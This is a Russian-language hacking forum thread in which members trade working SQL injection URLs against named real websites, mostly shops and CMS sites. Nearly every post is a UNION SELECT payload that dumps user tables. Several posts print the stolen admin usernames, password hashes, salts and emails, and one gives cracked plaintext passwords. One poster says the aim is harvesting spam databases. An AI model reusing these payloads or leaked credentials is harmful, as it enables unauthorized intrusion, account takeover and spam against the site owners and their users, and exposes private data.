SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    Code:
    http://www.mumbles.co.uk/shopinfo.php?ID=-18773+union+select+table_name,2,3,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables+limit+50,1/*
    Code:
    http://www.mumbles.co.uk/shopinfo.php?ID=-18773+union+select+concat(Username,0x3a,Password,0x3a,FromPage,0x3a,Email,0x3a,MobileNumber,0x3a,),2,3,4,5,6,7,8,9,10,11,12,13,14+from+UsersInfo+limit+10,1/*
    Лимитом работаем, 5 версия дядя мускуля )
     
    3 people like this.
  2. satana8920

    satana8920 Палач Античата

    Joined:
    22 Sep 2006
    Messages:
    396
    Likes Received:
    138
    Reputations:
    6
    от нечего делать пробежался по шопам
    HTML:
    http://www.littlepinkshop.com/shop/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
    http://www.genesissurfshop.com/shop/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
    http://www.naturallydoesit.co.uk/shop/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
    http://www.healthbeyond2000.co.nz/shop/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
    http://www.patriciawatson.net/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
    http://simplybearings.com/shop/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
    
    Собираем спам Базы чистый валид 99 %
     
    #4702 satana8920, 10 Feb 2008
    Last edited: 11 Feb 2008
    5 people like this.
  3. lexa007

    lexa007 Elder - Старейшина

    Joined:
    22 Nov 2006
    Messages:
    71
    Likes Received:
    24
    Reputations:
    -5
    http://www.multyclub.com/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*







    http://kinofant.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*

    Webmaster
    bespredel12
     
    2 people like this.
  4. Sleep

    Sleep Elder - Старейшина

    Joined:
    31 Oct 2007
    Messages:
    274
    Likes Received:
    65
    Reputations:
    4
    Code:
    http://www.programas-hacker.com/html/modules.php?name=Downloads&d_op=modifydownloadrequest&lid=-1+UNION+SELECT+0,1,2,table_name,1,1,4,0,0+FROM+information_schema.tables
    Code:
    http://www.programas-hacker.com/html/modules.php?name=Downloads&d_op=modifydownloadrequest&lid=-1+UNION+SELECT+0,1,2,aid,1,1,4,0,0+FROM+nuke_authors+where+radminsuper=1
    WeKe:98eb438495ae86cf58689cee138c6f57
    Зы какойто хак ресурс :D
     
    4 people like this.
  5. CaNNabi$

    CaNNabi$ Elder - Старейшина

    Joined:
    21 Jan 2008
    Messages:
    62
    Likes Received:
    110
    Reputations:
    0
    Code:
    http://www.wallables.com/catalog/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
    http://www.scootsusa.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
    http://www.tickettoride.org.uk/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
    http://www.sci-mentor.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
    http://www.naturalheating.co.uk/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
    http://www.makeupbyarmando.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
    https://sunrisehealthcoach.sslpowered.com/catalog/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
    http://www.kutukutubuku.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
    http://www.littlesunflowers.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
    http://www.exeltek.com.au/secure/catalog/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
    
     
    2 people like this.
  6. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    Code:
    http://www.diaetverzeichnis.de/news.php?id=-1%27%20union%20select%201,username,password,4,5%20from%20dir_admins/*
    Code:
    http://1awningdirectory.com/news.php?id=-1%27%20union%20select%201,username,password,4,5%20from%20dir_admins/*
    Code:
    http://www.halonbank.pl/index.php?group=-1+UNION+SELECT+1,VERSION(),3/*
     
    4 people like this.
  7. CaNNabi$

    CaNNabi$ Elder - Старейшина

    Joined:
    21 Jan 2008
    Messages:
    62
    Likes Received:
    110
    Reputations:
    0
    Code:
    http://tekno-tel.com.tr/index.php?option=com_neorecruit&task=offer_view&id=369852+UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+FROM+jos_users--
    
    admin:319e55412bb74b020ed3f3a234abd467
    login admin
    pass cenk


    Code:
    http://www.martimarket.com/marti/index.php?option=com_neorecruit&task=offer_view&id=369852+UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+FROM+jos_users--
    
    admin:c46a6b1297f0a201ba45276c97487886:pAWU6dFjN5UKqBqy

    Code:
    http://www.nounouchelanou.com/index.php?option=com_neorecruit&task=offer_view&id=369852+UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+FROM+jos_users--
    
    admin:6d9556fe5e923f525bd376b5269318b4

    Code:
    http://www.kinayperde.com/index.php?option=com_neorecruit&task=offer_view&id=369852+UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+FROM+jos_users--
    
    admin:bd0d324fd449c451d27e287e3c6e6af4

    Code:
    http://www.afbdcn.113t.info/index.php?option=com_neorecruit&task=offer_view&id=369852+UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+FROM+jos_users--
    
    Will:05f2cb7fe7346197f105afd7af4dd026:w5pYowRB0DCpiIiZ

    Code:
    http://supermaringa.com/index.php?option=com_neorecruit&task=offer_view&id=369852+UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+FROM+jos_users--
    
    mandarinus:e28aafeef6b3b3dc297d39dcab223d45:ds57L9nOm9V0imMx
     
    4 people like this.
  8. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    http://www.big6.com/showarticle.php?id=-16+union+select+concat(username,0x3a,user_id),1,2,3,4+from+big6_users+limit+68,1/*


    1.Дальше не вышло,не подобрать мне поля пароля :Р
    2.ДОС тут мона провести?)
     
  9. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    http://www.big6.com/showarticle.php?id=-16+union+select+concat(username,0x3a,user_password),1,2,3,4+from+big6_users+limit+1,1/*

    altosburg:165d048d997eebc4bc3aefd47feddbf2:bDrlLmb295
     
    1 person likes this.
  10. CaNNabi$

    CaNNabi$ Elder - Старейшина

    Joined:
    21 Jan 2008
    Messages:
    62
    Likes Received:
    110
    Reputations:
    0
    www.russianstreets.ru русские улицы)

    Code:
    http://russianstreets.ru/portal/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
    
    2292:27c27680c60d01a3d8e475240c939205225ccb1a


    www.atpc.ru про фотошо, веб програмировение и т.д.)

    Code:
    http://atpc.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
    
    1a4f:1181e27c6638e80849094d2e0966f37a9072d1d0


    www.housefind.ru че то про недвижимость)
    Code:
    http://housefind.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
    
    20da:b56a3d1f438b73afc451937e699969df9fba86a2


    www.night.su никто не хочет в ночные клубы Москвы
    Code:
    http://night.su/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
    
    6fc9:477bde830dd48056f8dba9d43e70d7cc8103bd93


    www.kitchenz.ru кулинарам сюда)
    Code:
    http://kitchenz.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
    
    2817:b94713de6a8efa6091262460fb1eced95d108a4c


    www.medfind.ru медецина)
    Code:
    http://medfind.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
    
    429a:b56a3d1f438b73afc451937e699969df9fba86a2


    www.stop-dieta.com против диеты)))
    Code:
    http://www.stop-dieta.com/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
    
    0933:8b3adfeb5c4380ff9da37b2d7d500b2cbf25f790


    www.vfgieu.ru филиал какого то универа не короч че то там)
    Code:
    http://www.vfgieu.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
    
    63f5:e2a6a026d820802d28da72c53ea7960539b9ce71



    www.nkamsk.name Новости Нижнекамска (городской портал кажется)))
    Code:
    http://nkamsk.name/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
    
    c4b6:2c4f19dcdd338c700ca350214b5b3c2094d96b6c


    www.kerben.org какой то Кыргызский сайт кажется)
    Code:
    http://www.kerben.org/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
    
    8504:bba57d5597ca1249e69e61b870f89a62b9273930


    www.make-up.by Косметика) минералы с Мертвого моря))
    Code:
    http://www.make-up.by/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
    
    918c:8c15408d26cec74dd28a945e2cf28f9a3c684f11


    www.rsp-ufa.ru коме Републиканская Стамоталогия?)
    Code:
    http://www.rsp-ufa.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
    
    77e8:a2ceeb92aaaa985d41ee276bf5fcdf0f9b24fd13


    www.dtp38.ru какая то автогражданка по русски :D
    Code:
    http://dtp38.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
    
    bc25:bc0c5764022f27adcf9b600c0b8a920c227d36e2


    www.auto.nkamsk.name че то про автомобили)
    Code:
    http://www.auto.nkamsk.name/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
    
    f894:b6746140b60a76f50f8fc5ca804dca41944649dc

    Я не могу остановиться :( все равно дальше делаю это же SQL, ща наверно еще выложу
     
    2 people like this.
  11. satana8920

    satana8920 Палач Античата

    Joined:
    22 Sep 2006
    Messages:
    396
    Likes Received:
    138
    Reputations:
    6
    вот еще вам
    HTML:
    http://szinkronnelkul.com/index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6/**/FROM/**/admin/*admin=1
    HTML:
    http://mypageranking.net/index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6/**/FROM/**/admin/*%20admin=1
    admin:admin
    HTML:
    http://everything2.com/index.pl?node_id=0/**/UNION/**/SELECT/**/null,101,null,1,null,null,passwd,null,null,nick,null/**/FROM/**/user/**/WHERE/**/nick/**/!%3d/**/''/**/%23
    HTML:
    http://av.nkphospital.com/main/index.php?area=1&p=downloads&categ=-1+union+select+1,concat(email,0x3a,pass),3+from+kpro_user/*
    [email protected]:39271cf0b30b9f91afb9dc9d19b961af:520253
    ЗЫ так сказать утреньяя зарядка :D
     
    #4711 satana8920, 11 Feb 2008
    Last edited: 11 Feb 2008
    2 people like this.
  12. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    Code:
    http://www.onderhoudsmiddelen.com/111.php?id=-1+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5/*
     
  13. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    osCommerce Addon Customer Testimonials 3.1
     
    1 person likes this.
  14. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    Code:
    http://www.smabbs-bogor.net/temp.php?lempar=almost.php&&id=-1+union+select+1,concat(user_name,0x3a,password),3,4,5,6+from+user_login/*
    
    VarisH:00ba80d60e631918488e6d3703d9d184
    alfin:017abbc00348b7a340877c6d13fb6cef
    secret:9a618248b64db62d15b300a07b00580b
    teddy:122d7e77ee418122ec3cf286a28a9d88
     
    4 people like this.
  15. lexa007

    lexa007 Elder - Старейшина

    Joined:
    22 Nov 2006
    Messages:
    71
    Likes Received:
    24
    Reputations:
    -5
    PHP:
     http://dmredcross.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*

    http://www.yeisk-kurort.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*

    http://www.softservice.by/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*

    http://www.orizona.info/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*

    http://540-731.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*

    http://internetconsulting.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*


     
     
  16. rankor777

    rankor777 Elder - Старейшина

    Joined:
    11 Jan 2008
    Messages:
    15
    Likes Received:
    23
    Reputations:
    0
    Code:
    http://www.robotech.com/news/sortnews.php?categoryid=10+order+by+1/*
    
    а дальше хз )
     
  17. rankor777

    rankor777 Elder - Старейшина

    Joined:
    11 Jan 2008
    Messages:
    15
    Likes Received:
    23
    Reputations:
    0
    вот еще:
    Code:
    http://syracuselivemusic.com/messageboards.php?type=general_mb&id=1+order+by+2/*
     
    1 person likes this.
  18. rankor777

    rankor777 Elder - Старейшина

    Joined:
    11 Jan 2008
    Messages:
    15
    Likes Received:
    23
    Reputations:
    0
    Code:
    http://thestarclub.org/tour/detail.php?id=1+union+select+1,2,user(),4/*
    а как пароль достать йа не знаю (
     
    1 person likes this.
  19. rankor777

    rankor777 Elder - Старейшина

    Joined:
    11 Jan 2008
    Messages:
    15
    Likes Received:
    23
    Reputations:
    0
    Code:
    http://www.e-nygma.be/muse/movie.php?id=1+order+by+14/*
     
    1 person likes this.
  20. Ky3bMu4

    Ky3bMu4 Elder - Старейшина

    Joined:
    3 Feb 2007
    Messages:
    487
    Likes Received:
    284
    Reputations:
    42
    it's my
    Code:
    00ba80d60e631918488e6d3703d9d184:SALSA
    9a618248b64db62d15b300a07b00580b:supersecret
    
     
    1 person likes this.
Thread Status:
Not open for further replies.